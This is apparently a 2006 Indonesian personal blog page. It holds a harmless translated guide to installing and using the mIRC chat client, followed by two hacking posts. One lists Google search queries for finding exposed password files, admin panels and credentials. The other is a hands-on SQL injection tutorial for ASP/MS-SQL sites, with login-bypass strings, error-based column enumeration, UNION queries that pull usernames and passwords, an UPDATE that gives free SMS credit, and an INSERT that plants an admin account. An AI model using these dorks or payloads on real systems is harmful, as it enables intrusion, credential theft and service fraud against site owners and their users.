MIRC

MIRC adalah sebuah program yang berbasis pada Bahasa Inggris dan tidak mempunyai versi translasi pada saat ini. Walaupun begitu, penggunaan mIRC tidaklah terlalu sulit untuk orang-orang yang tidak berbicara/berbahasa dalam Bahasa Inggris. Semua tombol, kegunaan-kegunaan dan fungsi-fungsi dapat digunakan dengan mudah dan langsung menuju perintah-perintah dan setting-setting. Installasi mIRC dan penggunaan IRC untuk pertama kalinya adalah hal yang selalu menjadi masalah/rintangan utama. Oleh karena itu kami ingin memberikan jalan keluar melalui file ini dan terjemahannya.

Informasi ini ditranslasikan oleh Dityo Nurasto dari file asli yang ditulis oleh Tjerk Vonck dan terdapat pada website mIRC http://www.mirc.co.uk/english.txt. Perlu diketahui bahwa Tjerk tidak berbicara dalam Bahasa Indonesia *he.he.he*. Pertanyaan-pertanyaan mengenai mIRC dapat dikirimkan melalui e-mail ke help@mirc.com dan tentu saja menggunakan Bahasa Inggris.

Apa itu IRC.

IRC (Internet Relay Chat) adalah suatu tempat bertemu virtual (maya) dimana semua orang dari seluruh dunia dapat bertemu dan berbicara, well- type. Sebagai pengguna anda dapat menjalankan mIRC; suatu program kecil yang dapat berhubungan dengan sebuah server didalam jaringan IRC. Semua server saling berhubungan dan menyampaikan pesan dari pengguna ke pengguna yang lain pada jaringan IRC. Anda dapat saja berpatisipasi dalam sebuah grup diskusi pada salah satu channel dari ribuan channel IRC yang ada, pada salah satu jaringan dari ratusan jaringan IRC yang ada, atau hanya berbicara dengan keluarga atau dengan teman-teman secara pribadi (private), dimanapun mereka berada. Anda dapat menemukan banyak perbedaan dalam minat, ide-ide dan persoalan-persoalan dalam IRC.


Apa itu mIRC.


Untuk menggunakan IRC anda dapat menggunakan program kecil seperti mIRC, sebuah program IRC client untuk Windows dan didistribusikan sebagai program shareware, program ini dibuat oleh Khaled Mardam-Bey. mIRC merupakan program IRC client yang bersahabat, mIRC sudah dibuat secara baik dengan tool-tool dan option-option yang baik. Anda dapat mendownload mIRC dengan gratis pada mIRC homepage dengan alamat http://www.mirc.com/. Didalam file help ini kami akan membantu anda untuk mendownload, menginstall dan menggunakan mIRC.

Bagaimana bergabung dengan IRC.

Tidak usah khawatir, kami akan membantu anda untuk mendownload, menginstall, dan men-Setup mIRC. Jika anda telah membaca hingga sejauh ini pasti anda sudah merasa yakin untuk mendapatkan dan menginstall mIRC pada PC anda, jika tidak sekarang, yah bisa besok! Teruslah membaca dan ikuti instruksi-instruksi yang diberikan........

Jika anda tersesat ke suatu tempat maka bacalah kembali paragraph-paragraph ini. Jika tidak dapat dilakukan dengan *mudah* untuk pertama kalinya, anda dapat membuat suatu langkah kecil secara menyamping/bertahap dan bacalah informasi lainnya!. Saya ingin menyarankan agar anda membaca intro IRC pada http://www.mirc.com/ircintro.html Ingatlah!; disana tersedia banyak sekali bantuan dan informasi tetapi -anda- harus membacanya.

Bagaimana caranya mendownload mIRC.

mIRC didistribusikan dalam bentuk self-extracting cabinets (Program setup yang berbentuk file yang dapat dieksekusi/dijalankan) yang dapat menginstallkan mIRC dalam PC anda. Cara kerja program setup mIRC sama dengan banyak program-program internet lainnya atau seperti layaknya program-program yang mempunyai fasilitas setup. Pertama-tama anda harus mengetahui Operating System dimana mIRC akan dijalankan. mIRC tersedia dalam bentuk 16 bit dan 32 bit. mIRC dalam bentuk 16 bit digunakan pada Operating System yang lama (16 bit) seperti Windows 3.1 atau Windows 3.11. mIRC dalam bentuk 32 bit digunakan pada Operating System seperti Windows95, Windows98, Windows2000 atau Windows NT.

Saya berani bertaruh! Anda pasti sudah tahu cabinet (program setup) yang anda perlukan! Program setup jenis 16 bit dinamakan seperti mircxxs.exe. Lihat huruf 's' pada kata tersebut? maksud dari 's' adalah 'sixteen'(enam belas). Program setup jenis 32 bit dinamakan seperti mircxxt.exe. Maksud Huruf 't' yang ada dikata tersebut adalah 'thirty-two' (tiga dua).

Sekarang anda telah siap mendownload program setup yang benar dan sesuai untuk komputer anda, anda dapat mendowloadnya dari salah satu website mIRC. Jalankan web-browser anda dan kunjungi http://www.mirc.com atau salah satu dari mirrornya. Anda akan melihat sebuah link yang menuntun anda menuju ke halaman download yang berisi link-link untuk mendownload program mIRC. Tidak menjadi masalah untuk mendowload dari sebuah link yang anda klik; link-link disana menawarkan file yang sama! dan tentu saja downloadlah file dari lokasi yang paling terdekat dengan lokasi anda sehingga proses download dapat berjalan lebih cepat. Simpanlah file yang telah anda pilih ke harddisk anda. Pilih sebuah direktori dalam harddisk anda dan letakkan pada suatu direktori tersebut sehingga anda dapat menemukannya kembali pada waktu yang akan datang. Bersabarlah (orang sabar disayang Tuhan), proses download mIRC mungkin akan berjalan dalam waktu beberapa menit...

Lalu apa yang akan dilakukan? Installasi (penginstalan)!

Sekarang anda telah mempunyai mIRC yang telah anda download, sekarang anda telah siap untuk menginstallasi mIRC dalam PC anda. Apakah anda hafal dengan nama file yang telah anda download? Carilah dalam harddisk anda. Setelah anda menemukannya anda dapat mengklik dua kali pada program mIRC. Proses tersebut akan memulai penginstalan mIRC. Program akan meminta anda untuk membaca user licence, dan juga akan menanyakan 'Destination folder'; direktori yang akan anda gunakan untuk menginstallasikan mIRC pada harddisk anda. Biasanya anjuran penggunaan direktori c:mirc dapat menjadi suatu ide yang baik. Tekan tombol 'OK' selama beberapa kali dan tekan tombol 'Install', setelah itu proses installasi telah selesai! Program setup akan menjalankan semua tugasnya dengan sendirinya (self manage).

Sekarang jalankan mIRC untuk pertama kalinya.

Sekarang mIRC sudah terinstall pada PC anda dan siap untuk digunakan. Sebelum anda menjalankannya, anda harus mengaktifkan koneksi ke internet / dalam keadaan on-line. Caranya persis seperti pada saat anda menggunakan modem, ok! sekarang carilah ikon mIRC yang terletak pada suatu tempat di Start Menu atau pada program group mIRC. Anda dapat mengklik ikon tersebut untuk menjalankan mIRC.

mIRC berjalan untuk pertama kalinya dan akan menampilkan Options menu. Option menu membutuhkan informasi tentang diri anda dan harus diisi. Pada saat pertama kali menjalankan mIRC, dialog 'Connect' amatlah penting. Hal ini adalah hal yang paling pertama kali ada pada list. Lupakan semua option yang membingungkan anda. Isilah line-line ini dengan mengisikan Full name, E-mail address, Nickname dan Alternate:

Full Name: Nama asli anda (contoh, Tjerk Vonck)

E-mail address: Alamat E-mail anda (contoh, tjerk@mirc.com)

Nickname: Satu hingga sembilan huruf untuk nama panggilan yang akan digunakan pada chat system (contoh, Kreet)

Alternate: Jika orang lain telah menggunakan nama yang anda pilih, anda akan dikenal dengan nama alternate ini (contoh, Kreet2)

Anda dapat memilih IRC server jika anda mau, tetapi boleh saja anda menggunakan server yang standar yaitu Random US DALnet. Anda tidak *perlu* menggunakan nama asli anda dan alamat e-mail anda jika anda ingin tetap tidak dikenali. Oh iya, lihat checkbox kecil yang ada tulisan 'Invisible mode' ? saya menyarankan agar anda mengaktifkan itu karena hal ini merupakan 'pelindung' anda dari keadaan terlihat di pencarian Server-wide (pencarian secara luas pada server-server).

Sekarang semua telah diset, tekan pada tombol besar yang tulisannya 'Connect to IRC server' dan anda akan langsung masuk ke IRC. Selamat! dan yang paling asyik; anda tidak perlu mengutak-atik setting anda lagi :).

Lalu apa yang terjadi?


Tenang saja dan lihatlah kekiri kekanan (bengong)... Banyak hal yang terjadi. mIRC (dengan berharap) membuat koneksi dengan salah satu DALnet IRC server. Server ini akan mengirimkan sedikit pesan kepada anda tentang status system pada status window, lalu Folder mIRC Channel akan muncul. Perhatikan baik-baik; folder channel ini menampilkan pilihan channel IRC yang terpopuler diseluruh dunia dan tentu saja channel-channel yang berbahasa Inggris. Tentu saja Anda boleh memilih salah satu dari channel tersebut! Anda dapat mengklik dua kali pada channel apa saja yang ada list.


Ketika anda bergabung (join) pada sebuah channel, sebuah window baru akan muncul pada layar monitor anda. Nama-nama yang ada dikolom sebelah kanan adalah orang-orang yang telah chatting (ngobrol) pada channel tersebut. Kolom sebelah kiri adalah tempat pembicaraan, segala yang anda tulis pada inputbox yang berada di bawah kedua kolom tersebut akan muncul disini. Cobalah untuk menyapa 'Hi!' kepada orang-orang yang pada channel tersebut, tulis saja kata tersebut pada kotak garis tunggal yang berada dibawah channel window... Bergembiralah dan ngobrol terus!

Untuk meninggalkan sebuah channel, tekan dua kali pada tombol close, yang berada pada pojok kiri atas dari channel window.

Hey, asyik sekali ini!

Memang!.. Seperti yang anda lihat, tidak terlalu sulitkan untuk bermain dalam IRC. Dan sekarang anda telah sejauh ini, disana masih banyak yang perlu di jelajahi! List channel yang pendek itu belum seluruhnya kompit!. Masih banyak ribuan channel yang ada pada jaringan IRC. Anda dapat mengetik/menulis perintah /list untuk melihat semua channel yang ada.

Hint: Pada menu perintah (commands menu) - diatas layar anda - semua perintah dasar mIRC dapat ditemukan. Hal ini sangat berguna jika anda tidak tahu apa yang anda lakukan.

Anda dapat melakukan koneksi ke jaringan-jaringan IRC yang lain dengan mudah. Seperti yang anda telah lihat, didalam menu File/Options/Connect anda dapat memilih jaringan-jaringan IRC yang lain dan server-server IRC yang lain. Tekanlah tombol besar 'Connect to IRC server' untuk membuka koneksi ke sebuah jaringan yang lain. Cobalah!

Jika anda ingin bertemu dengan beberapa teman di IRC, pastikanlah anda menggunakan jaringan IRC yang sama. Walaupun Anda tahu channel-nya tetapi anda tidak tahu jaringan yang mereka pakai, hal ini sama saja seperti anda mencari jalan utama tetapi tidak mengetahui kotanya.

Sekarang anda telah menginstall mIRC dan hal ini dapat menambah sedikit pengetahuan anda. Pada saat pertama kali memang akan terlihat sangat memusingkan/membingungkan tetapi anda telah menggunakan hingga tahap pertengahan. Dan jangan lupa!; disana pasti selalu ada orang-orang yang ramah yang akan membantu anda...tanyakan saja pertanyaan anda pada mereka jika anda membutuhkan sedikit pertolongan!

Anda dapat memutuskan hubungan (disconnect) dari IRC dengan menakan tombol yang berada di atas sebelah kiri pada bar tombol. Tombol itu menunjukan tanda yang berbeda jika anda koneksi dan pada saat tidak terkoneksi. Sebelum memutuskan hubungan saya menyarankan agar anda mencoba tombol-tombol lainnya. Mungkin anda membutuhkannya nanti.

Lihat juga mIRC HELP menu. mIRC dilengkapi dengan dua file help yang penting; satu untuk mIRC, dan satu lagi untuk IRC secara umum. File yang terakhir -Intro IRC- Saya sebelumnya dan sangat sangat menyarankan agar anda membaca file tersebut hari ini atau besok. Intro IRC menerangkan hampir semua kejadian, anda pasti akan menemui suatu kejadian pada suatu saat dan hal ini akan menerangkan kebiasaan aneh dan tingkah yang lucu dari orang-orang yang ada pada IRC kepada anda!

Sukses, dan bersenang-senanglah di IRC!

Dipembahasan terdahulu ada Cara Bergabung dengan MIRC Kolong ( Tempat Tukar Info Bawah Tanah)


posted by Mr. Dhe Dhay at 1:56 AM 0 comments
Tuesday, October 10, 2006
PENCARIAN CEPAT (HACKING DENGAN GOOGLE)
Khusus Buat Putri Yang Ada di Surabaya ( Mlg ), cara Hacking sederhana yang bisa kita gunakan dengan mengunakan bantuan Google? ini sedekit sekali dari ribuan cara yg bisa digunakan oleh para Hacker
RAGAM HACKING DENGAN MENGGUNAKAN GOOGLE

intitle:"Index of" .htpasswd ( Mencari Pasword )
intitle:"Index of" stats.html
intitle:"Index of" backup
intitle:"Index of" etc
intitle:"Index of" finance.xls

"http://*:*@www" domainname

intitle:"eXist Database Administration" -demo
index.of.password
inurl:"av_viewer.html" inurl:"av_contents1.html"
inurl:"j_contents1.html"
inurl:"j_viewer.html" -site:altcode.com
access denied for user" "using password"
intitle:"WmSC e-Cart Administration")
intitle:"WebMyStyle e-Cart Administration" "AutoCreate=TRUE password=*"
intitle:"Device Status Summary Page" -demo
The Master List 5) intext:"Target Multicast Group" "beacon"
"# -FrontPage-" ext:pwd
inurl:(service authors administrators users) "# -FrontPage-"
inurl:service.pwd
intitle:"SHOUTcast Administrator" inurl:admin.cgi
passlist.txt (a better way)
intitle:"SHOUTcast Administrator")(intext:"U SHOUTcast D.N.A.S. Status"
"A syntax error has occurred" filetype:ihtml
intitle:IMP inurl:imp/index.php3
auth_user_file.txt
intitle:"TWIG Login"
allinurl: admin mdb
Salam
Ddy

posted by Mr. Dhe Dhay at 7:17 PM 0 comments
Cara Hack Website
Hallo Semua? Apakabar? Sorry Sudah Lama Offline? ini ada sedikit cerpen tentang cara hack sebuah Website ,tapi jangan di gunakan untuk kejahatan ya

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....

posted by Mr. Dhe Dhay at 7:01 PM 16 comments
Tuesday, June 20, 2006

0 Comments